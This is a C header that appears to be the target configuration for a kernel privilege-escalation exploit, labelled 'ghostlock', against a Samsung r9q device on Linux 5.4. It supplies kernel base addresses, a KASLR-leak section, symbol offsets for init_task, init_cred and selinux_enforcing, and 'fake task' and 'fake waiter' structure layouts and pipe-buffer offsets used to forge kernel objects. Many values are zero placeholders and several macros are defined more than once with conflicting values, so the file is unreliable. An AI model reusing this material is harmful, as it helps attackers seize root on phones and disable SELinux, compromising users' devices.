#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "ghostlock_samsung_r9q"
#define BUILD_FINGERPRINT "samsung/r9qxx/r9q"

// VA_BITS=39 memory layout (Samsung Exynos/Snapdragon 5.4.289)
#define KIMAGE_TEXT_BASE 0xffffffc010000000ULL
#define P0_PAGE_OFFSET   0xffffffc000000000ULL
#define P0_PHYS_OFFSET   0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL
#define DIRECT_MAP_BASE  0xffffffc000000000ULL
#define DIRECT_MAP_END   0xffffffd000000000ULL
#define VMEMMAP_START    0xfffffffe00000000ULL

/* KASLR leak */
#define SLIDE_NFULNL_LOGGER_OFF       0x0ULL
#define SLIDE_LOGGERS_0_1_OFF         0x0ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x0ULL
#define SLIDE_SYSCTL_BOOTID_OFF       0x0ULL

/* Derived macros */
#define INIT_TASK           (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_CRED           (KIMAGE_TEXT_BASE + INIT_CRED_OFF)
#define INIT_UTS_NS         (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define EMPTY_ZERO_PAGE     (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP     (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING   (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define KPTR_RESTRICT       (KIMAGE_TEXT_BASE + KPTR_RESTRICT_OFF)
#define SELINUX_BLOB_SIZES  (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES      (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS   (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)
#define ASHMEM_MISC_FOPS    (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS         (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL        (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP         (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN         (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE      (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO  (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER      (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ    (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK         (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define SLIDE_NFULNL_LOGGER_IMAGE       (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE         (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE           (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE     (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE       (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

/* file_operations offsets (stable) */
#define FOPS_OWNER_OFF        0x00
#define FOPS_LLSEEK_OFF       0x10
#define FOPS_READ_OFF         0x18
#define FOPS_WRITE_OFF        0x20
#define FOPS_READ_ITER_OFF    0x28
#define FOPS_WRITE_ITER_OFF   0x30
#define FOPS_IOCTL_OFF        0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF         0x60
#define FOPS_OPEN_OFF         0x68
#define FOPS_RELEASE_OFF      0x78
#define FOPS_SPLICE_READ_OFF  0xb8
#define FOPS_SHOW_FDINFO_OFF  0xd8

/* Global symbol offsets — senin nm çıktından */
#define INIT_TASK_OFF               0x12d61e80
#define ROOT_TASK_GROUP_OFF         0x132a2448
#define SELINUX_ENFORCING_OFF       0x13449414

#define ASHMEM_IOCTL_OFF            0x101d9e18
#define COMPAT_ASHMEM_IOCTL_OFF     0x101da738
#define ASHMEM_MMAP_OFF             0x101da78c
#define ASHMEM_OPEN_OFF             0x101da930
#define ASHMEM_RELEASE_OFF          0x101da9a8
#define ASHMEM_SHOW_FDINFO_OFF      0x101dab08

#define CALL_USERMODEHELPER_EXEC_WORK_OFF 0x1031e0cc
#define NOOP_LLSEEK_OFF             0x10543488
#define COPY_SPLICE_READ_OFF        0x1058cf10

// Configfs uyarlamaları (iter yok → file kullanılıyor)
#define CONFIGFS_READ_ITER_OFF      0x1060c948   // configfs_read_file
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x1060caa8   // configfs_write_file

/* Derived macros */
#define INIT_TASK           (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define ROOT_TASK_GROUP     (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING   (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define ASHMEM_IOCTL        (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define COMPAT_ASHMEM_IOCTL (KIMAGE_TEXT_BASE + COMPAT_ASHMEM_IOCTL_OFF)
#define ASHMEM_MMAP         (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN         (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE      (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO  (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER      (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ    (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK         (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)

// Slide alias extras
#define SLIDE_NFULNL_LOGGER_NAME_IMAGE       0x0ULL
#define SLIDE_NFULNL_LOGGER_OBJECT_IMAGE     0x0ULL
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_IMAGE 0x0ULL

// Slide pselect ayarları
#define SLIDE_PSELECT_WORD_SHIFT 0
#define SLIDE_PSELECT_NFDS       320
#define SLIDE_USE_SELECT         1


// Ashmem extras
#define ASHMEM_MISC_FOPS_OFF   0x0ULL
#define ASHMEM_FOPS_OFF        0x0ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x0ULL

// Fake task offsets
#define FAKE_TASK_USAGE_OFF          0x00
#define FAKE_TASK_PRIO_OFF           0x7C
#define FAKE_TASK_NORMAL_PRIO_OFF    0x84
#define FAKE_TASK_TASK_GROUP_OFF     0x348
#define FAKE_TASK_PI_LOCK_OFF        0x8C4
#define FAKE_TASK_PI_WAITERS_OFF     0x8D0
#define FAKE_TASK_PI_TOP_TASK_OFF    0x8E0
#define FAKE_TASK_PI_BLOCKED_ON_OFF  0x8E8

// Config page layout
#define CFG_PAGE_OFF            16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF      88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF     100

// Workqueue offsets (placeholder)
#define SYSTEM_UNBOUND_WQ       0x0ULL
#define PWQ_WORK_COLOR_OFF      0x0ULL
#define PWQ_REFCNT_OFF          0x0ULL
#define PWQ_NR_ACTIVE_OFF       0x0ULL
#define PWQ_MAX_ACTIVE_OFF      0x0ULL
#define PWQ_NR_IN_FLIGHT_OFF    0x0ULL
#define WORK_FUNC_OFF           0x0ULL


// Config page layout
#define LOCK_OFF      0x0E80
#define W0_OFF        0x1180
#define FOPS_OFF      0x0F80
#define SCRATCH_OFF   0x1200
#define RIGHT_OFF     0x1240
#define LEFT_OFF      0x1260
#define FAKE_TASK_OFF 0x1280

// Pipe/slab extras
#define ANON_PIPE_BUF_OPS_OFF  0x0ULL
#define KMALLOC_CACHES_OFF     0x0ULL

// Workqueue extras
#define CALL_USERMODEHELPER_EXEC_WORK 0x0ULL
#define SYSTEM_UNBOUND_WQ_OFF 0x0ULL
#define WQ_DFL_PWQ_OFF        0x0ULL
#define PWQ_WORK_COLOR_OFF    0x0ULL
#define PWQ_REFCNT_OFF        0x0ULL
#define PWQ_NR_ACTIVE_OFF     0x0ULL
#define PWQ_MAX_ACTIVE_OFF    0x0ULL
#define PWQ_NR_IN_FLIGHT_OFF  0x0ULL
#define WORK_FUNC_OFF         0x0ULL


/* Slide macros — senin cihaz için */
#define SLIDE_TRACEFS_EVENT_ID        73
#define SLIDE_TRACEFS_WORKER_CALLER_OFF 0x000dbd9cULL   // NP1’den referans, Samsung 5.4’te genelde aynı
#define SLIDE_PSELECT_WORD_SHIFT      0

#define ROOT_UMH_WORK_OFF   0x0ULL
#define ROOT_UMH_DATA_OFF   0x0ULL
#define ROOT_UMH_PATH       0x0ULL
#define SYSTEM_UNBOUND_WQ_OFF 0x0ULL
#define PWQ_POOL_OFF        0x0ULL
#define PWQ_WQ_OFF          0x0ULL
#define POOL_WORKLIST_OFF   0x0ULL
#define POOL_NR_IDLE_OFF    0x0ULL
#define WORK_ENTRY_OFF      0x0ULL
#define WORK_DATA_OFF       0x0ULL


#define FAKE_WAITER_TREE_PRIO_OFF         0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF     0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF     0x18
#define FAKE_WAITER_PI_TREE_PRIO_OFF      0x30
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF  0x38
#define FAKE_WAITER_TASK_OFF              0x30
#define FAKE_WAITER_LOCK_OFF              0x38
#define FAKE_WAITER_WAKE_STATE_OFF        0x00
#define FAKE_WAITER_WW_CTX_OFF            0x00

/* Struct offsets (5.4, pahole ile çıkarılacak) */
#define TASK_PRIO_OFF         0x7C
#define TASK_NORMAL_PRIO_OFF  0x84
#define TASK_TASK_GROUP_OFF   0x348
#define TASK_PI_LOCK_OFF      0x8C4
#define TASK_COMM_OFF         0x800
#define TASK_CRED_OFF         0x7F0

#define STRUCT_PAGE_SIZE      0x40
#define PIPE_BUFFER_SIZE      0x28
#define FOPS_IOCTL_OFF        0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF         0x60
#define FOPS_OPEN_OFF         0x68
#define FOPS_RELEASE_OFF      0x78
#define FOPS_SHOW_FDINFO_OFF  0xd8

/* Pipe / page / slab offsets (stable) */
#define STRUCT_PAGE_SIZE              0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF         0x08
#define STRUCT_PAGE_TYPE_OFF          0x30
#define PIPE_BUFFER_SIZE         0x28
#define PIPE_BUFFER_SLOTS        32
#define PIPE_BUF_FLAG_CAN_MERGE  0x10
#define PIPE_INODE_INFO_STRUCT_SIZE   0xb8
#define PIPE_INODE_INFO_SIZE          0xc0
#define PIPE_INODE_INFO_SLOTS_PER_PAGE 21
#define PIPE_HEAD_OFF                 0x60
#define PIPE_TAIL_OFF                 0x64
#define PIPE_MAX_USAGE_OFF            0x68
#define PIPE_RING_SIZE_OFF            0x6c
#define PIPE_NR_ACCOUNTED_OFF         0x70
#define PIPE_READERS_OFF              0x74
#define PIPE_WRITERS_OFF              0x78
#define PIPE_FILES_OFF                0x7c
#define PIPE_TMP_PAGE_OFF             0x90
#define PIPE_BUFS_OFF                 0xa8
#define PIPE_USER_OFF                 0xb0

#endif
